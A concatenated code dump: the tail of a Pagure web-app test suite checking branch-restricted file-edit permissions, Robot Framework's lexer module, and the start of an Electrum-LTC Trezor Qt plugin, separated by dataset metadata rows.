"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_contributor_passed_epel8(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel8",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel8 did change
output = self.app.get("/hooktest/raw/epel8/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_commit_passed_epel8(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="commit",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel8",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel8 did change
output = self.app.get("/hooktest/raw/epel8/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_contributor_passed_epel(self):
# Same test as above but the target branch change
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel did change
output = self.app.get("/hooktest/raw/epel/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_contributor_passed_epel_no_regex(self):
# Same test as above but the allowed branch has no regex
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
# Check file after the commit:
# master did not change
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# epel did change
output = self.app.get("/hooktest/raw/epel/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_contributor_denied_epel8_no_regex(self):
# Same test as above but the allowed branch has no regex
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "epel8",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
# epel not found
output = self.app.get("/hooktest/raw/epel8/f/sources")
self.assertEqual(output.status_code, 404)
| 35.693721 | 92 | 0.53857 |
4a22754faa4739ea57aea8d5f0f0dead5c675d3e | 7,895 | py | Python | src/robot/parsing/lexer/lexer.py | zavatoni/pyStudy_test_robotframework | fbf43aefea694a8404f5870b8c92f42165b10667 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robot/parsing/lexer/lexer.py | zavatoni/pyStudy_test_robotframework | fbf43aefea694a8404f5870b8c92f42165b10667 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/robot/parsing/lexer/lexer.py | zavatoni/pyStudy_test_robotframework | fbf43aefea694a8404f5870b8c92f42165b10667 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from itertools import chain
from robot.errors import DataError
from robot.utils import get_error_message, FileReader
from .blocklexers import FileLexer
from .context import InitFileContext, TestCaseFileContext, ResourceFileContext
from .tokenizer import Tokenizer
from .tokens import EOS, Token
def get_tokens(source, data_only=False, tokenize_variables=False):
"""Parses the given source to tokens.
:param source: The source where to read the data. Can be a path to
a source file as a string or as ``pathlib.Path`` object, an already
        opened file object, or Unicode text containing the data directly.
Source files must be UTF-8 encoded.
:param data_only: When ``False`` (default), returns all tokens. When set
to ``True``, omits separators, comments, continuations, and other
non-data tokens.
Returns a generator that yields :class:`~robot.parsing.lexer.tokens.Token`
instances.
"""
lexer = Lexer(TestCaseFileContext(), data_only, tokenize_variables)
lexer.input(source)
return lexer.get_tokens()
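# Minimal usage sketch (the source may also be plain text, per the docstring above):
#
#   for token in get_tokens("*** Test Cases ***\nExample\n    Log    Hello\n"):
#       print(token.type, repr(token.value))
#
# which yields Token objects with types such as TESTCASE_HEADER, TESTCASE_NAME,
# SEPARATOR, KEYWORD, ARGUMENT, EOL and the virtual EOS markers.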
def get_resource_tokens(source, data_only=False, tokenize_variables=False):
"""Parses the given source to resource file tokens.
Otherwise same as :func:`get_tokens` but the source is considered to be
a resource file. This affects, for example, what settings are valid.
"""
lexer = Lexer(ResourceFileContext(), data_only, tokenize_variables)
lexer.input(source)
return lexer.get_tokens()
def get_init_tokens(source, data_only=False, tokenize_variables=False):
"""Parses the given source to init file tokens.
Otherwise same as :func:`get_tokens` but the source is considered to be
a suite initialization file. This affects, for example, what settings are
valid.
"""
lexer = Lexer(InitFileContext(), data_only, tokenize_variables)
lexer.input(source)
return lexer.get_tokens()
class Lexer(object):
def __init__(self, ctx, data_only=False, tokenize_variables=False):
self.lexer = FileLexer(ctx)
self.data_only = data_only
self.tokenize_variables = tokenize_variables
self.statements = []
def input(self, source):
for statement in Tokenizer().tokenize(self._read(source),
self.data_only):
# Store all tokens but pass only data tokens to lexer.
self.statements.append(statement)
if self.data_only:
data = statement[:]
else:
# Separators, comments, etc. already have type, data doesn't.
data = [t for t in statement if t.type is None]
if data:
self.lexer.input(data)
def _read(self, source):
try:
with FileReader(source, accept_text=True) as reader:
return reader.read()
except:
raise DataError(get_error_message())
def get_tokens(self):
self.lexer.lex()
statements = self._handle_old_for(self.statements)
if not self.data_only:
statements = chain.from_iterable(
self._split_trailing_commented_and_empty_lines(s)
for s in statements
)
tokens = self._get_tokens(statements)
if self.tokenize_variables:
tokens = self._tokenize_variables(tokens)
return tokens
def _get_tokens(self, statements):
# Setting local variables is performance optimization to avoid
# unnecessary lookups and attribute access.
if self.data_only:
ignored_types = {None, Token.COMMENT_HEADER, Token.COMMENT,
Token.OLD_FOR_INDENT}
else:
ignored_types = {None}
name_types = (Token.TESTCASE_NAME, Token.KEYWORD_NAME)
separator_type = Token.SEPARATOR
eol_type = Token.EOL
for statement in statements:
name_seen = False
separator_after_name = None
prev_token = None
for token in statement:
token_type = token.type
if token_type in ignored_types:
continue
if name_seen:
if token_type == separator_type:
separator_after_name = token
continue
if token_type != eol_type:
yield EOS.from_token(prev_token)
if separator_after_name:
yield separator_after_name
name_seen = False
if token_type in name_types:
name_seen = True
prev_token = token
yield token
if prev_token:
yield EOS.from_token(prev_token)
def _handle_old_for(self, statements):
end_statement = [Token(Token.SEPARATOR), Token(Token.END)]
old_for = False
for statement in statements:
marker = self._get_first_data_token(statement)
if marker:
if marker.type == Token.OLD_FOR_INDENT:
old_for = True
elif old_for:
if marker.type == Token.END:
# We get here if block has been indented with '\' but
# there is also 'END'. The former is deprecated and
# removing the value causes a deprecation warning.
marker.value = ''
else:
yield end_statement
old_for = False
yield statement
if old_for:
yield end_statement
def _get_first_data_token(self, statement):
non_data_tokens = Token.NON_DATA_TOKENS + (None,)
for token in statement:
if token.type not in non_data_tokens:
return token
return None
def _split_trailing_commented_and_empty_lines(self, statement):
lines = self._split_to_lines(statement)
commented_or_empty = []
for line in reversed(lines):
if not self._is_commented_or_empty(line):
break
commented_or_empty.append(line)
if not commented_or_empty:
return [statement]
lines = lines[:-len(commented_or_empty)]
statement = list(chain.from_iterable(lines))
return [statement] + list(reversed(commented_or_empty))
def _split_to_lines(self, statement):
lines = []
current = []
for token in statement:
current.append(token)
if token.type == Token.EOL:
lines.append(current)
current = []
if current:
lines.append(current)
return lines
def _is_commented_or_empty(self, line):
separator_or_ignore = (Token.SEPARATOR, None)
comment_or_eol = (Token.COMMENT, Token.EOL)
for token in line:
if token.type not in separator_or_ignore:
return token.type in comment_or_eol
return False
def _tokenize_variables(self, tokens):
for token in tokens:
for t in token.tokenize_variables():
yield t
| 37.595238 | 78 | 0.615326 |
4a22767117fd56e2dd92fcb330eed7ea6c329b17 | 1,445 | py | Python | theano/sandbox/minimal.py | michaelosthege/aesara | 55c88832ba71f87c9612d573ede74a4c042ef570 | [
"BSD-3-Clause"
] | 1 | 2020-12-30T19:12:52.000Z | 2020-12-30T19:12:52.000Z | theano/sandbox/minimal.py | luke14free/Theano-PyMC | 511c778f8a595444e009bcad738d552413b16f2c | [
"BSD-3-Clause"
] | null | null | null | theano/sandbox/minimal.py | luke14free/Theano-PyMC | 511c778f8a595444e009bcad738d552413b16f2c | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from theano import tensor
from theano.gof.graph import Apply
from theano.gof.op import Op
class Minimal(Op):
# TODO : need description for class
# if the Op has any attributes, consider using them in the eq function.
# If two Apply nodes have the same inputs and the ops compare equal...
# then they will be MERGED so they had better have computed the same thing!
__props__ = ()
def __init__(self):
# If you put things here, think about whether they change the outputs
# computed by # self.perform()
# - If they do, then you should take them into consideration in
# __eq__ and __hash__
# - If they do not, then you should not use them in
# __eq__ and __hash__
super().__init__()
def make_node(self, *args):
# HERE `args` must be THEANO VARIABLES
return Apply(op=self, inputs=args, outputs=[tensor.lscalar()])
def perform(self, node, inputs, out_):
(output,) = out_
# HERE `inputs` are PYTHON OBJECTS
# do what you want here,
# but do not modify any of the arguments [inplace].
print("perform got %i arguments" % len(inputs))
print("Max of input[0] is ", np.max(inputs[0]))
# return some computed value.
# do not return something that is aliased to one of the inputs.
output[0] = np.asarray(0, dtype="int64")
minimal = Minimal()
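# Minimal usage sketch (assumes `import theano` alongside the imports above):
#
#   x = tensor.vector()
#   f = theano.function([x], minimal(x))
#   f([1.0, 2.0, 3.0])  # prints the argument count and the max, returns array(0)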
| 30.744681 | 79 | 0.636678 |
4a2277040c23e3f0a6c45560a469e691667eb95f | 5,284 | py | Python | task/pose.py | crockwell/pytorch_stacked-hourglass-cutout | 35c97d1e3515e9c2fad78c4c666c4a9cc4a77055 | [
"BSD-3-Clause"
] | 4 | 2020-01-01T12:27:59.000Z | 2022-03-04T15:59:36.000Z | task/pose.py | crockwell/pytorch_stacked-hourglass-cutout | 35c97d1e3515e9c2fad78c4c666c4a9cc4a77055 | [
"BSD-3-Clause"
] | null | null | null | task/pose.py | crockwell/pytorch_stacked-hourglass-cutout | 35c97d1e3515e9c2fad78c4c666c4a9cc4a77055 | [
"BSD-3-Clause"
] | null | null | null | """
__config__ contains the options for training and testing
Basically all of the variables related to training are put in __config__['train']
"""
import torch
import numpy as np
from torch import nn
import os
from torch.nn import DataParallel
from utils.misc import make_input, make_output, importNet
__config__ = {
'data_provider': 'data.MPII.dp',
'network': 'models.posenet.PoseNet',
'inference': {
'nstack': 2,
'inp_dim': 256,
'oup_dim': 16,
'num_parts': 16,
'increase': 0,
'keys': ['imgs'],
'num_eval': 2958, ## number of val examples used. entire set is 2958
'train_num_eval': 300, ## number of train examples tested at test time
},
'train': {
'batchsize': 16,
'input_res': 256,
'output_res': 64,
'train_iters': 1000,
'valid_iters': 10,
'learning_rate': 1e-3,
'max_num_people' : 1,
'loss': [
['combined_hm_loss', 1],
],
'decay_iters': 100000,
'decay_lr': 2e-4,
'num_workers': 2,
'use_data_loader': True,
'mean': [.3643, .3437, .3156],
'stdev': [.1510, .1469, .1472],
'cutout_size': 64,
'cutout_prob': 1,
'num_holes': 2,
},
}
class Trainer(nn.Module):
"""
    The wrapper module that will behave differently for training or testing
inference_keys specify the inputs for inference
"""
def __init__(self, model, inference_keys, calc_loss=None):
super(Trainer, self).__init__()
self.model = model
self.keys = inference_keys
self.calc_loss = calc_loss
def forward(self, imgs, **inputs):
inps = {}
labels = {}
for i in inputs:
if i in self.keys:
inps[i] = inputs[i]
else:
labels[i] = inputs[i]
if not self.training:
return self.model(imgs, **inps)
else:
combined_hm_preds = self.model(imgs, **inps)
if type(combined_hm_preds)!=list and type(combined_hm_preds)!=tuple:
combined_hm_preds = [combined_hm_preds]
loss = self.calc_loss(**labels, combined_hm_preds=combined_hm_preds)
return list(combined_hm_preds) + list([loss])
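# Note on the call contract above: keyword arguments whose names are not listed
# in `inference_keys` are treated as labels and routed to calc_loss, so a
# training-mode call shaped like
#
#   *heatmap_preds, loss = trainer(imgs, heatmaps=ground_truth)  # 'heatmaps' is an assumed label key
#
# returns the per-stack predictions followed by the loss.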
def make_network(configs):
train_cfg = configs['train']
config = configs['inference']
def calc_loss(*args, **kwargs):
return poseNet.calc_loss(*args, **kwargs)
## creating new posenet
PoseNet = importNet(configs['network'])
poseNet = PoseNet(**config)
forward_net = DataParallel(poseNet.cuda())
config['net'] = Trainer(forward_net, configs['inference']['keys'], calc_loss)
## optimizer, experiment setup
train_cfg['optimizer'] = torch.optim.Adam(filter(lambda p: p.requires_grad,config['net'].parameters()), train_cfg['learning_rate'])
exp_path = os.path.join('exp', configs['opt'].exp)
if configs['opt'].exp=='pose' and configs['opt'].continue_exp is not None:
exp_path = os.path.join('exp', configs['opt'].continue_exp)
if not os.path.exists(exp_path):
os.mkdir(exp_path)
logger = open(os.path.join(exp_path, 'log'), 'a+')
def make_train(batch_id, config, phase, **inputs):
for i in inputs:
try:
inputs[i] = make_input(inputs[i])
except:
pass #for last input, which is a string (id_)
net = config['inference']['net']
config['batch_id'] = batch_id
net = net.train()
if phase != 'inference':
result = net(inputs['imgs'], **{i:inputs[i] for i in inputs if i!='imgs'})
num_loss = len(config['train']['loss'])
losses = {i[0]: result[-num_loss + idx]*i[1] for idx, i in enumerate(config['train']['loss'])}
loss = 0
toprint = '\n{}: '.format(batch_id)
for i in losses:
loss = loss + torch.mean(losses[i])
my_loss = make_output( losses[i] )
my_loss = my_loss.mean()
if my_loss.size == 1:
toprint += ' {}: {}'.format(i, format(my_loss.mean(), '.8f'))
else:
toprint += '\n{}'.format(i)
for j in my_loss:
toprint += ' {}'.format(format(j.mean(), '.8f'))
logger.write(toprint)
logger.flush()
if phase == 'train':
optimizer = train_cfg['optimizer']
optimizer.zero_grad()
loss.backward()
optimizer.step()
if batch_id == config['train']['decay_iters']:
## decrease the learning rate after decay # iterations
for param_group in optimizer.param_groups:
param_group['lr'] = config['train']['decay_lr']
return None
else:
out = {}
net = net.eval()
result = net(**inputs)
if type(result)!=list and type(result)!=tuple:
result = [result]
out['preds'] = [make_output(i) for i in result]
return out
return make_train
| 33.443038 | 135 | 0.539364 |
4a22776ae7502680bb7d4e9c9dfbe014a66ed10b | 2,382 | py | Python | vae/vae_train.py | Brikwerk/vocals-generation | 36fff07698aa8d8de12d4478968081347a444cb6 | [
"MIT"
] | null | null | null | vae/vae_train.py | Brikwerk/vocals-generation | 36fff07698aa8d8de12d4478968081347a444cb6 | [
"MIT"
] | null | null | null | vae/vae_train.py | Brikwerk/vocals-generation | 36fff07698aa8d8de12d4478968081347a444cb6 | [
"MIT"
] | null | null | null | from asyncio.log import logger
import random
from src.dataset import StemsDataset
from src.vae_models import LitVAE
import torch
import torch.nn as nn
from torch.utils.data import DataLoader, random_split
import pytorch_lightning as pl
from pytorch_lightning import loggers as pl_loggers
from pl_bolts.models.autoencoders.components import (
resnet18_decoder,
resnet18_encoder,
resnet50_decoder,
resnet50_encoder,
)
import numpy as np
if __name__ == "__main__":
# Config
input_size = (1, 216, 216)
# encoder_output_dim = 512 # Resnet18
encoder_output_dim = 2048 # Resnet50
latent_dim = 1024
batch_size = 6
gpus = 1
epochs = 550
# Ensure reproducibility
torch.manual_seed(42)
random.seed(42)
np.random.seed(42)
# Create an amend encoder and decoder
# for processing spectrograms.
encoder = resnet50_encoder(False, False)
encoder.conv1 = nn.Conv2d(input_size[0], 64,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
bias=False
)
decoder = resnet50_decoder(
latent_dim=latent_dim,
input_height = input_size[1],
first_conv=False,
maxpool1=False
)
# decoder.conv1 = nn.Conv2d(64, input_size[0], # ResNet18
decoder.conv1 = nn.Conv2d(256, input_size[0], # ResNet50
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
bias=False
)
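    # The in_channels above differ because the resnet50 decoder's last
    # up-sampling block outputs 256 channels (Bottleneck expansion 4 x 64),
    # while the resnet18 decoder outputs 64 -- hence the two commented variants.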
# Load the dataset
dataset = StemsDataset(
data_root='FOLDER_PATH_TO_DATA_GOES_HERE',
)
# Split into train and test sets
train_size = int(0.8 * len(dataset))
test_size = len(dataset) - train_size
train_dataset, test_dataset = random_split(dataset, [train_size, test_size])
# Create data loaders
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=16,
)
test_loader = DataLoader(
test_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=16,
)
vae = LitVAE(encoder, decoder,
enc_output_dim=encoder_output_dim,
latent_dim=latent_dim,
input_size=input_size)
tb_logger = pl_loggers.TensorBoardLogger("./logs/", "VAE")
trainer = pl.Trainer(
gpus=gpus,
max_epochs=epochs,
logger=tb_logger)
trainer.fit(vae, train_loader)
| 25.340426 | 80 | 0.652813 |
4a22782ebf57053095ec5f6c86c144e6d695062d | 2,155 | py | Python | should_test/collections.py | kzawisto/should_test | fb0bff80ba9de44654c53b4b8164d90036359b77 | [
"MIT"
] | null | null | null | should_test/collections.py | kzawisto/should_test | fb0bff80ba9de44654c53b4b8164d90036359b77 | [
"MIT"
] | null | null | null | should_test/collections.py | kzawisto/should_test | fb0bff80ba9de44654c53b4b8164d90036359b77 | [
"MIT"
] | null | null | null | from .core import Matching
class ADict(Matching):
def __init__(self, value):
super(ADict, self).__init__()
self.value = value
@property
def should(self):
        val = ADictShould(self.value)
val.trace = self.trace
return val
class ADictShould(Matching):
def __init__(self, value):
super(ADictShould, self).__init__()
self.value = value
def _this_and_other(self, other):
return "actual {} and expected {}".format(self.value, other)
def verify_same_keys(self, other):
keyset_actual = set(self.value.keys())
keyset_other = set(other.keys())
diff1= keyset_actual.difference(keyset_other)
diff2= keyset_other.difference(keyset_actual)
if len(diff1) != 0:
message = self._this_and_other(other) + " have different keys:" + \
"{} are present in actual but not in expected".format(diff1)
return self.get_match_result(
False,
message,
"" # negated failure never happens
)
if len(diff2) != 0:
message = self._this_and_other(other) + " have different keys:" + \
"{} are present in expected but not in actual".format(diff2)
return self.get_match_result(
False,
message,
"" # negated failure never happens
)
return None
def verify_same_values(self, other):
        different_keys = [i for i in self.value.keys() if self.value[i] != other[i]]
message = self._this_and_other(other) + " are not equal:\n " +\
"\n".join([
"at key {k}: {v1} is not equal to {v2}"
.format(k=k, v1=self.value[k], v2=other[k])
for k in different_keys
])
return self.get_match_result(
len(different_keys) == 0,
message,
self._this_and_other(other) + " are equal."
)
def be_equal_to(self, other):
are_keys_not_same = self.verify_same_keys(other)
if are_keys_not_same:
            return are_keys_not_same
        return self.verify_same_values(other)
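# Minimal usage sketch (assumes Matching.get_match_result from .core returns a
# pass/fail result object, and relies on `should` returning an ADictShould):
#
#   result = ADict({"a": 1, "b": 2}).should.be_equal_to({"a": 1, "b": 2})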
| 32.164179 | 85 | 0.563805 |
4a2279d946415c55c4b7a4775061a916b5591f4f | 1,588 | py | Python | release/stubs.min/System/Windows/Forms/__init___parts/SplitterCancelEventArgs.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/SplitterCancelEventArgs.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/SplitterCancelEventArgs.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class SplitterCancelEventArgs(CancelEventArgs):
"""
Provides data for splitter events.
SplitterCancelEventArgs(mouseCursorX: int,mouseCursorY: int,splitX: int,splitY: int)
"""
@staticmethod
def __new__(self, mouseCursorX, mouseCursorY, splitX, splitY):
""" __new__(cls: type,mouseCursorX: int,mouseCursorY: int,splitX: int,splitY: int) """
pass
MouseCursorX = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Gets the X coordinate of the mouse pointer in client coordinates.
Get: MouseCursorX(self: SplitterCancelEventArgs) -> int
"""
MouseCursorY = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Gets the Y coordinate of the mouse pointer in client coordinates.
Get: MouseCursorY(self: SplitterCancelEventArgs) -> int
"""
SplitX = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the X coordinate of the upper left corner of the System.Windows.Forms.SplitContainer in client coordinates.
Get: SplitX(self: SplitterCancelEventArgs) -> int
Set: SplitX(self: SplitterCancelEventArgs)=value
"""
SplitY = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the Y coordinate of the upper left corner of the System.Windows.Forms.SplitContainer in client coordinates.
Get: SplitY(self: SplitterCancelEventArgs) -> int
Set: SplitY(self: SplitterCancelEventArgs)=value
"""
| 24.060606 | 128 | 0.678212 |
4a227b3b4f8a1ac0d68e241322b2f367068550bf | 2,327 | py | Python | test/functional/feature_config_args.py | CoinBitCore/temp | a2ebefc861aa979b441286a203d574197459b0d6 | [
"MIT"
] | null | null | null | test/functional/feature_config_args.py | CoinBitCore/temp | a2ebefc861aa979b441286a203d574197459b0d6 | [
"MIT"
] | null | null | null | test/functional/feature_config_args.py | CoinBitCore/temp | a2ebefc861aa979b441286a203d574197459b0d6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Coinbit Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test various command line arguments and configuration file parameters."""
import os
from test_framework.test_framework import CoinbitTestFramework
from test_framework.util import get_datadir_path
class ConfArgsTest(CoinbitTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
self.stop_node(0)
# Remove the -datadir argument so it doesn't override the config file
self.nodes[0].args = [arg for arg in self.nodes[0].args if not arg.startswith("-datadir")]
default_data_dir = get_datadir_path(self.options.tmpdir, 0)
new_data_dir = os.path.join(default_data_dir, 'newdatadir')
new_data_dir_2 = os.path.join(default_data_dir, 'newdatadir2')
# Check that using -datadir argument on non-existent directory fails
self.nodes[0].datadir = new_data_dir
self.assert_start_raises_init_error(0, ['-datadir='+new_data_dir], 'Error: Specified data directory "' + new_data_dir + '" does not exist.')
# Check that using non-existent datadir in conf file fails
conf_file = os.path.join(default_data_dir, "coinbit.conf")
with open(conf_file, 'a', encoding='utf8') as f:
f.write("datadir=" + new_data_dir + "\n")
self.assert_start_raises_init_error(0, ['-conf='+conf_file], 'Error reading configuration file: specified data directory "' + new_data_dir + '" does not exist.')
# Create the directory and ensure the config file now works
os.mkdir(new_data_dir)
self.start_node(0, ['-conf='+conf_file, '-wallet=w1'])
self.stop_node(0)
assert os.path.isfile(os.path.join(new_data_dir, 'regtest', 'wallets', 'w1'))
# Ensure command line argument overrides datadir in conf
os.mkdir(new_data_dir_2)
self.nodes[0].datadir = new_data_dir_2
self.start_node(0, ['-datadir='+new_data_dir_2, '-conf='+conf_file, '-wallet=w2'])
assert os.path.isfile(os.path.join(new_data_dir_2, 'regtest', 'wallets', 'w2'))
if __name__ == '__main__':
ConfArgsTest().main()
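# Editor's note (illustrative, not part of the test): the precedence exercised
# above is "-datadir on the command line wins over datadir= in the config file".
# A hypothetical coinbit.conf demonstrating the same behaviour:
#
#   datadir=/tmp/conf-datadir
#   # launched as: coinbitd -conf=<path>/coinbit.conf -datadir=/tmp/cli-datadir
#   # -> wallets are created under /tmp/cli-datadir, not /tmp/conf-datadir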
| 46.54 | 169 | 0.694027 |
4a227bf75eb031a5b8e9bdde6107eea80a26c4ad | 24,617 | py | Python | plugins/trezor/qt_generic.py | namuyan/electrum-fjc | 1a5c4a582f0fcdbaeca2b721ee729f43cd7915a2 | ["MIT"] | 1 | 2017-07-06T03:03:25.000Z | 2017-07-06T03:03:25.000Z | plugins/trezor/qt_generic.py | namuyan/electrum-fjc | 1a5c4a582f0fcdbaeca2b721ee729f43cd7915a2 | ["MIT"] | null | null | null | plugins/trezor/qt_generic.py | namuyan/electrum-fjc | 1a5c4a582f0fcdbaeca2b721ee729f43cd7915a2 | ["MIT"] | null | null | null |
from functools import partial
import threading
from PyQt4.Qt import Qt
from PyQt4.Qt import QGridLayout, QInputDialog, QPushButton
from PyQt4.Qt import QVBoxLayout, QLabel, SIGNAL
from electrum_ltc_gui.qt.util import *
from .plugin import TIM_NEW, TIM_RECOVER, TIM_MNEMONIC
from ..hw_wallet.qt import QtHandlerBase, QtPluginBase
from electrum_ltc.i18n import _
from electrum_ltc.plugins import hook, DeviceMgr
from electrum_ltc.util import PrintError, UserCancelled
from electrum_ltc.wallet import Wallet, Standard_Wallet
PASSPHRASE_HELP_SHORT =_(
"Passphrases allow you to access new wallets, each "
"hidden behind a particular case-sensitive passphrase.")
PASSPHRASE_HELP = PASSPHRASE_HELP_SHORT + " " + _(
"You need to create a separate Electrum wallet for each passphrase "
"you use as they each generate different addresses. Changing "
"your passphrase does not lose other wallets, each is still "
"accessible behind its own passphrase.")
RECOMMEND_PIN = _(
"You should enable PIN protection. Your PIN is the only protection "
"for your litecoins if your device is lost or stolen.")
PASSPHRASE_NOT_PIN = _(
"If you forget a passphrase you will be unable to access any "
"litecoins in the wallet behind it. A passphrase is not a PIN. "
"Only change this if you are sure you understand it.")
CHARACTER_RECOVERY = (
"Use the recovery cipher shown on your device to input your seed words. "
"The cipher changes with every keypress.\n"
"After at most 4 letters the device will auto-complete a word.\n"
"Press SPACE or the Accept Word button to accept the device's auto-"
